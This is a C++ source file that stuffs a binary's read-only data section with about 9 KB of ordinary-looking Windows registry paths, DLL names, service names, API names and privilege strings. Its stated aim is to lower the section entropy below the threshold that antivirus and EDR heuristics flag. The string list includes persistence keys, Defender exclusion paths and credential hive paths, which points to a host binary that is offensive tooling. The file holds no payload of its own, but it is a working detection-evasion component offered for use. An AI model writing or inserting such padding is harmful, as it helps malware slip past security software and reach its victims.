// entropy_pad.cpp
// Low-entropy .rdata content that pulls the binary's average section entropy
// below the 6.0 threshold used by common AV/EDR heuristics.
// ~9 KB of realistic Windows registry paths, file paths, and status strings.

// jocky_epad_anchor is an extern "C" function so /include finds it unmangled.
// The static string inside goes into .rdata naturally.
#pragma comment(linker, "/include:jocky_epad_anchor")

extern "C" __declspec(noinline) const char* jocky_epad_anchor(void) {
    static const char k[] =

// Registry paths
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\0"
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\0"
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\0"
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\0"
"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\0"
"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\0"
"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\0"
"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\0"
"SOFTWARE\\Microsoft\\Windows Defender\0"
"SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\0"
"SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\0"
"SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection\0"
"SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\0"
"SOFTWARE\\Policies\\Microsoft\\Windows Defender\0"
"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\0"
"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\0"
"SOFTWARE\\Microsoft\\Office\\16.0\\Common\0"
"SOFTWARE\\Microsoft\\Office\\16.0\\Word\\Options\0"
"SOFTWARE\\Microsoft\\Office\\16.0\\Excel\\Options\0"
"SYSTEM\\CurrentControlSet\\Services\0"
"SYSTEM\\CurrentControlSet\\Control\\Session Manager\0"
"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\0"
"SYSTEM\\CurrentControlSet\\Control\\ComputerName\\ActiveComputerName\0"
"SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation\0"
"SYSTEM\\CurrentControlSet\\Control\\Lsa\0"
"SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0\0"
"SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\0"
"SYSTEM\\CurrentControlSet\\Enum\\USBSTOR\0"
"SYSTEM\\CurrentControlSet\\Services\\EventLog\0"

// Windows file paths
"C:\\Windows\\System32\\cmd.exe\0"
"C:\\Windows\\System32\\rundll32.exe\0"
"C:\\Windows\\System32\\svchost.exe\0"
"C:\\Windows\\System32\\services.exe\0"
"C:\\Windows\\System32\\lsass.exe\0"
"C:\\Windows\\System32\\winlogon.exe\0"
"C:\\Windows\\System32\\explorer.exe\0"
"C:\\Windows\\System32\\taskmgr.exe\0"
"C:\\Windows\\System32\\regedit.exe\0"
"C:\\Windows\\System32\\mmc.exe\0"
"C:\\Windows\\System32\\wbem\\wmiprvse.exe\0"
"C:\\Windows\\System32\\wbem\\wmic.exe\0"
"C:\\Windows\\System32\\cscript.exe\0"
"C:\\Windows\\System32\\wscript.exe\0"
"C:\\Windows\\System32\\powershell.exe\0"
"C:\\Windows\\SysWOW64\\cmd.exe\0"
"C:\\Windows\\SysWOW64\\rundll32.exe\0"
"C:\\Windows\\SysWOW64\\regsvr32.exe\0"
"C:\\Windows\\System32\\drivers\\etc\\hosts\0"
"C:\\Windows\\Temp\0"
"C:\\Windows\\System32\\config\\SAM\0"
"C:\\Windows\\System32\\config\\SYSTEM\0"
"C:\\Windows\\System32\\config\\SOFTWARE\0"
"C:\\Windows\\System32\\config\\SECURITY\0"
"C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\0"
"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\0"
"C:\\Users\\Public\\Documents\0"
"C:\\Users\\Default\\AppData\\Roaming\0"
"C:\\Program Files\\Common Files\\Microsoft Shared\0"
"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\0"

// Windows DLL names
"kernel32.dll\0"
"ntdll.dll\0"
"user32.dll\0"
"advapi32.dll\0"
"shell32.dll\0"
"ole32.dll\0"
"oleaut32.dll\0"
"combase.dll\0"
"ws2_32.dll\0"
"wininet.dll\0"
"urlmon.dll\0"
"crypt32.dll\0"
"bcrypt.dll\0"
"ncrypt.dll\0"
"secur32.dll\0"
"wintrust.dll\0"
"imagehlp.dll\0"
"dbghelp.dll\0"
"psapi.dll\0"
"iphlpapi.dll\0"
"dnsapi.dll\0"
"rasapi32.dll\0"
"rpcrt4.dll\0"
"shlwapi.dll\0"
"version.dll\0"
"msvcrt.dll\0"
"vcruntime140.dll\0"
"msvcp140.dll\0"
"ucrtbase.dll\0"
"netapi32.dll\0"
"samlib.dll\0"
"wtsapi32.dll\0"
"setupapi.dll\0"

// Windows error/status message strings
"The operation completed successfully.\0"
"The system cannot find the file specified.\0"
"Access is denied.\0"
"The handle is invalid.\0"
"Not enough memory resources are available to process this command.\0"
"The process cannot access the file because it is being used by another process.\0"
"The parameter is incorrect.\0"
"The data area passed to a system call is too small.\0"
"Insufficient system resources exist to complete the requested service.\0"
"An attempt was made to reference a token that does not exist.\0"
"The system could not find the environment option that was entered.\0"
"The filename, directory name, or volume label syntax is incorrect.\0"
"The system cannot find the path specified.\0"
"A required privilege is not held by the client.\0"
"The object identifier does not represent a valid object.\0"
"This function is not supported on this system.\0"
"The requested operation requires elevation.\0"
"An attempt was made to load a program with an incorrect format.\0"
"The pipe has been ended.\0"
"No mapping for the Unicode character exists in the target multi-byte code page.\0"

// Environment variable names
"APPDATA\0"
"LOCALAPPDATA\0"
"PROGRAMDATA\0"
"PROGRAMFILES\0"
"PROGRAMFILES(X86)\0"
"COMMONPROGRAMFILES\0"
"SYSTEMROOT\0"
"SYSTEMDRIVE\0"
"WINDIR\0"
"USERPROFILE\0"
"USERNAME\0"
"USERDOMAIN\0"
"COMPUTERNAME\0"
"PROCESSOR_ARCHITECTURE\0"
"NUMBER_OF_PROCESSORS\0"
"PROCESSOR_IDENTIFIER\0"
"PATH\0"
"PATHEXT\0"
"TEMP\0"
"TMP\0"
"OS\0"
"HOMEDRIVE\0"
"HOMEPATH\0"
"LOGONSERVER\0"
"SESSIONNAME\0"
"PUBLIC\0"
"ALLUSERSPROFILE\0"

// Windows service names
"wuauserv\0"
"spooler\0"
"eventlog\0"
"Schedule\0"
"Themes\0"
"AudioSrv\0"
"BFE\0"
"BITS\0"
"CryptSvc\0"
"DcomLaunch\0"
"Dhcp\0"
"Dnscache\0"
"Eventlog\0"
"LanmanServer\0"
"LanmanWorkstation\0"
"lmhosts\0"
"MMCSS\0"
"MpsSvc\0"
"Netlogon\0"
"NlaSvc\0"
"nsi\0"
"PlugPlay\0"
"PolicyAgent\0"
"Power\0"
"ProfSvc\0"
"RasMan\0"
"RemoteRegistry\0"
"RpcEptMapper\0"
"RpcSs\0"
"SamSs\0"
"seclogon\0"
"SENS\0"
"SharedAccess\0"
"ShellHWDetection\0"
"slsvc\0"
"SSDPSRV\0"
"SysMain\0"
"TapiSrv\0"
"TermService\0"
"TrkWks\0"
"upnphost\0"
"UxSms\0"
"VSS\0"
"W32Time\0"
"WerSvc\0"
"WinDefend\0"
"WinHttpAutoProxySvc\0"
"Winmgmt\0"
"WinRM\0"
"wlansvc\0"
"WMPNetworkSvc\0"
"wscsvc\0"
"WSearch\0"

// Windows event log sources
"Application\0"
"Security\0"
"System\0"
"Setup\0"
"Microsoft-Windows-Security-Auditing\0"
"Microsoft-Windows-WindowsUpdateClient\0"
"Microsoft-Windows-Kernel-General\0"
"Microsoft-Windows-Kernel-Process\0"
"Microsoft-Windows-Kernel-Power\0"
"Microsoft-Windows-Ntfs\0"
"Microsoft-Windows-Wininit\0"
"Microsoft-Windows-Winlogon\0"
"Microsoft-Windows-Service Control Manager\0"
"Microsoft-Windows-TaskScheduler\0"
"Microsoft-Windows-DNS-Client\0"
"Microsoft-Windows-DHCP-Client\0"

// Windows API function names (as strings — realistic .rdata content)
"CreateFileW\0"
"ReadFile\0"
"WriteFile\0"
"CloseHandle\0"
"VirtualAlloc\0"
"VirtualFree\0"
"VirtualProtect\0"
"VirtualQuery\0"
"OpenProcess\0"
"CreateProcessW\0"
"TerminateProcess\0"
"GetExitCodeProcess\0"
"WaitForSingleObject\0"
"WaitForMultipleObjects\0"
"CreateThread\0"
"OpenThread\0"
"SuspendThread\0"
"ResumeThread\0"
"GetCurrentProcess\0"
"GetCurrentThread\0"
"GetCurrentProcessId\0"
"GetCurrentThreadId\0"
"GetModuleHandleW\0"
"GetModuleFileNameW\0"
"GetProcAddress\0"
"LoadLibraryW\0"
"FreeLibrary\0"
"GetSystemInfo\0"
"GlobalMemoryStatusEx\0"
"GetComputerNameW\0"
"GetUserNameW\0"
"GetVersionExW\0"
"RegOpenKeyExW\0"
"RegQueryValueExW\0"
"RegSetValueExW\0"
"RegCloseKey\0"
"CryptAcquireContextW\0"
"CryptCreateHash\0"
"CryptHashData\0"
"CryptGetHashParam\0"
"CryptDestroyHash\0"
"CryptReleaseContext\0"

// Filler: repeated realistic string data to reach entropy target
"Microsoft Corporation\0"
"Microsoft Windows\0"
"Windows Update\0"
"Windows Security\0"
"Windows Defender\0"
"Microsoft Office\0"
"Microsoft Visual Studio\0"
"Microsoft .NET Framework\0"
"Windows Installer\0"
"Windows Management Instrumentation\0"
"Remote Procedure Call\0"
"Security Account Manager\0"
"Local Security Authority\0"
"NT AUTHORITY\\SYSTEM\0"
"NT AUTHORITY\\LOCAL SERVICE\0"
"NT AUTHORITY\\NETWORK SERVICE\0"
"BUILTIN\\Administrators\0"
"BUILTIN\\Users\0"
"Everyone\0"
"Creator Owner\0"
"\\Device\\HarddiskVolume\0"
"\\\\?\\GlobalRoot\\Device\\HarddiskVolume\0"
"\\\\?\\Volume{\0"
"\\\\.\\\0"
"NTFS\0"
"FAT32\0"
"exFAT\0"
"HKEY_LOCAL_MACHINE\0"
"HKEY_CURRENT_USER\0"
"HKEY_USERS\0"
"HKEY_CLASSES_ROOT\0"
"HKEY_CURRENT_CONFIG\0"
"REG_SZ\0"
"REG_DWORD\0"
"REG_BINARY\0"
"REG_MULTI_SZ\0"
"REG_EXPAND_SZ\0"
"REG_QWORD\0"
"\\Registry\\Machine\\Software\0"
"\\Registry\\Machine\\System\0"
"\\Registry\\User\0"
"http://\0"
"https://\0"
"ftp://\0"
"ldap://\0"
"file://\0"
"\\pipe\\\0"
"Global\\\0"
"Local\\\0"
"Session\\\0"
"BaseNamedObjects\\\0"
"SECURITY\0"
"OWNERSHIP\0"
"SACL\0"
"DACL\0"
"TOKEN_PRIMARY\0"
"TOKEN_IMPERSONATION\0"
"SeDebugPrivilege\0"
"SeCreateTokenPrivilege\0"
"SeTcbPrivilege\0"
"SeLoadDriverPrivilege\0"
"SeBackupPrivilege\0"
"SeRestorePrivilege\0"
"SeTakeOwnershipPrivilege\0"
"SeShutdownPrivilege\0"
"SeRemoteShutdownPrivilege\0"
"SeSystemtimePrivilege\0"
"SeChangeNotifyPrivilege\0"
"SeUndockPrivilege\0"
"SeIncreaseBasePriorityPrivilege\0"
"SeCreatePagefilePrivilege\0"
"SeManageVolumePrivilege\0"
"SeImpersonatePrivilege\0"
"SeCreateGlobalPrivilege\0"
"SeIncreaseWorkingSetPrivilege\0"
"SeTimeZonePrivilege\0"
"SeCreateSymbolicLinkPrivilege\0"
"\0";
    return k;
}
